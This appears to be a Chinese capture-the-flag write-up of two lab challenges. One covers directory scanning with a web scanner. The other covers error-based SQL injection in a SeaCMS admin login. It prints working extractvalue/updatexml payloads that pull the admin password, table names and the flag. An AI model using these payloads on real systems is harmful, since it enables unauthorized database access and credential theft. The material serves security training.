尤里的复仇II 回归
渗透第一步-信息收集 1
Tips:
信息收集作为渗透测试的第一步,能决定后续测试的走向,甚至能直接找到目标的漏洞,那么如何才能在繁杂的网络世界里找到所需的数据呢?
尤里开始了努力……
最终他找到了目标的……
成功掌握了这一技能
基础目录扫描 传送门
题解:非常简单的目录扫描
直接用御剑扫描
不过flag在二级目录里
flag_{oh!you_find_it!}
渗透第一步-信息收集 2
Tips:
经过上次的事件,尤里深刻了解到信息收集的重要性,这次他决定利用信息收集轻松搞定个站点……
这个cms好像有个sql注入漏洞,找到它,拿到数据库里的flag吧!
传送门
开始拿到这题,先做了指纹识别,识别不出来就F12查看器查到了seacms
去网上查了poc,发现后台http://oovw8022.ia.aqlab.cn:8022/caidian/admin/?r=login有报错注入,抓包
user=123' or extractvalue(1,concat((select concat(0x7e,password,0x7e) from manage)))#&password=
或者
user=123' or updatexml(1,concat((select concat(0x7e,password,0x7e) from manage)),0)#&password=
拿到user:zkaqsea
拿到密码:seazkaq
登入后台:
没有发现flag,想着后台还有漏洞,去网上查了下,突然再看了一遍题目,flag在数据库里,入坑了
又去抓包
查库名:
1' or updatexml(1,concat(0x7e,(select database()),0x7e),1)# ---caidian
查表名:
1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) # ---adword,content,download,flag,im
查字段
1' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 1,1),0x7e),1) # ---flag
查具体数据
1' or updatexml(1,concat(0x7e,(select flag from flag limit 0,1),1),1) # ---flag_{oh!congratulations!}
果然拿到flag!